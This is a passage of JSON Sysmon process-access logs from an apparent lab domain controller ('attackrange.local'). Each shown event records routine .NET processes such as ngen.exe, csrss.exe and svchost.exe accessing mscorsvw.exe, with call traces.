08:05:39.023","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-00101D5A0D00}","TargetProcessId":"1344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7381,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:39.023\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-00101D5A0D00}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:39.023","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-00101D5A0D00}","TargetProcessId":"1344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7382,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:39.038\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-00101D5A0D00}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:39.038","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-00101D5A0D00}","TargetProcessId":"1344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7383,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:39.070\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010E02F0B00}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:39.070","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010E02F0B00}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7384,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:39.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010E02F0B00}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:39.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010E02F0B00}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7385,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:39.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-00109E5D0D00}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:39.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-00109E5D0D00}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7386,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:39.101\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-0010F3600D00}\r\nTargetProcessId: 4628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:39.101","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-0010F3600D00}","TargetProcessId":"4628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7387,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:39.101\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-0010F3600D00}\r\nTargetProcessId: 4628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:39.101","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-0010F3600D00}","TargetProcessId":"4628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7388,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:39.116\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-0010F3600D00}\r\nTargetProcessId: 4628\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 